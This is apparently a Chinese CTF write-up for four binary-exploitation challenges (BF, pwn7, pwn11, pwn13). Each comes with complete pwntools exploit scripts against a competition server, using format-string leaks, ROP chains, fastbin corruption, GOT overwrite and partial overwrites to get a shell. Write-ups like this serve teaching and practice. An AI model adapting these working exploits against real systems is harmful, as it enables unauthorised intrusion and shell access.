BF

首先覆盖掉seed,去掉rand()的随机化,然后通过输入的name进行格式化字符的泄漏,再通过rop串leak出libc_base,最后直接用one_gadgets getshell,exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
from LibcSearcher import *
a=[7427,39356,9595,54062,67371,42578,92585,76990,22615,53318,12615]
#p = process('./bf')
pop_rdi = 0xdb3
p = remote('111.33.164.4',50001)
p.sendline('1')

p.sendlineafter('name : ','%17$p%23$p'+'a'*18+p64(0))
for i in range(10):
	p.sendlineafter('guess:',str(a[i]))

p.recvuntil('0x')
canary = int(p.recv(16),16)
p.recvuntil('0x')
vmmap = int(p.recv(12),16) - 0xabf
p.sendline('a'*0x34+p64(canary)+p64(0)+p64(vmmap+pop_rdi)+p64(vmmap+0x202018)+p64(vmmap+0x8A0)+p64(vmmap+0XAbf))

p.recv(4)
puts_addr= u64(p.recv(6)+'\x00\x00')
print hex(puts_addr)
obj = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - obj.dump('puts')
print hex(libc_base)



p.sendline('1')
p.sendlineafter('name : ','a'*28+p64(0))
print hex(vmmap+0x202018)
for i in range(10):
	p.sendlineafter('guess:',str(a[i]))
p.sendline('b'*0x34+p64(canary)+p64(0)+p64(libc_base+0x41320))

p.interactive()

pwn7

edit函数堆溢出,通过改fd破坏fastbin,申请到notes数组附近,利用了stderr高位是0x7f绕过check。然后把第0个格改为puts@got,show(0)来leak libc,再把第0个格改为atoi@got,edit(0)改为system,然后在传choice时传/bin/sh即可getshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from LibcSearcher import *
p = process('./pwn')
p = remote('111.33.164.4',50007)
elf= ELF('./pwn')
libc = elf.libc
context.log_level='debug'
def add(size):
	p.recvuntil('choice >>')
	p.sendline('1')
	p.recvuntil('size:')
	p.sendline(str(size))
def show(index):
	p.recvuntil('choice >>')
	p.sendline('2')
	p.recvuntil('id:')
	p.sendline(str(index))
def edit(index,size,content):
	p.recvuntil('choice >>')
	p.sendline('3')
	p.recvuntil('id:')
	p.sendline(str(index))
	p.recvuntil('size:')
	p.sendline(str(size))
	p.recvuntil('content:')
	p.sendline(content)
def dell(index):
	p.recvuntil('choice >>')
	p.sendline('4')
	p.recvuntil('id:')
	p.sendline(str(index))
#gdb.attach(p,'b *0x400cea')
add(0x80)#0
add(0x80)#1
dell(0)
add(0x80)#0
show(0)
p.recvuntil('data:')
libc_base1 = u64(p.recv(6)+'\x00\x00')-0x3C4B78
print hex(libc_base1)

add(0x60)#2
add(0x60)#3
dell(3)
edit(2,0x80,'a'*0x68+p64(0x7f)+p64(0x6020bd))

one=[0x45216,0x4526a,0xf02a4,0xf1147]
add(0x60)#3
add(0x60)#4
edit(4,0x20,'a'*0x13+p64(0x602020))
show(0)

p.recvuntil('data:')

puts_addr = u64(p.recv(6)+'\x00\x00')
obj = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - obj.dump('puts')

print hex(libc_base)
edit(1,10,'/bin/sh\x00')
edit(4,0x20,'a'*0x13+p64(0x602068))
edit(0,0x20,p64(libc_base+obj.dump('system')))
p.recvuntil('choice >>')
p.sendline('/bin/sh\x00')

p.interactive()

pwn11

首先通过00截断绕过strcmp函数,然后就是栈溢出泄漏libc再getshell了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from LibcSearcher import *
#p = process('./pwn11')
p = remote('111.33.164.4',50011)
elf = ELF('./pwn11')
pop_rdi = 0x4012ab
main = 0x401162



p.sendline('nuoye')
p.sendline('abcd\x00'+'a'*0x1b+p64(0)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main))



p.recvuntil('ok!\n')
read_addr = u64(p.recv(6)+'\x00\x00')
obj = LibcSearcher('read',read_addr)
libc_base = read_addr-obj.dump('read')
print hex(libc_base)



p.sendline('nuoye')
p.sendline('abcd\x00'+'a'*0x1b+p64(0)+p64(pop_rdi)+p64(libc_base+obj.dump('str_bin_sh'))+p64(libc_base+obj.dump('system'))+p64(main))
p.interactive()

pwn13

简单的栈溢出,可以看到有后门,开了PIE而已,所以覆盖下最低位即可。

1
2
3
4
5
6
7
from pwn import *

#p = process('./pwn13')
p = remote('111.33.164.4',50013)
p.sendline('1')
p.send('a'*0x27+'b'+'\x50')
p.interactive()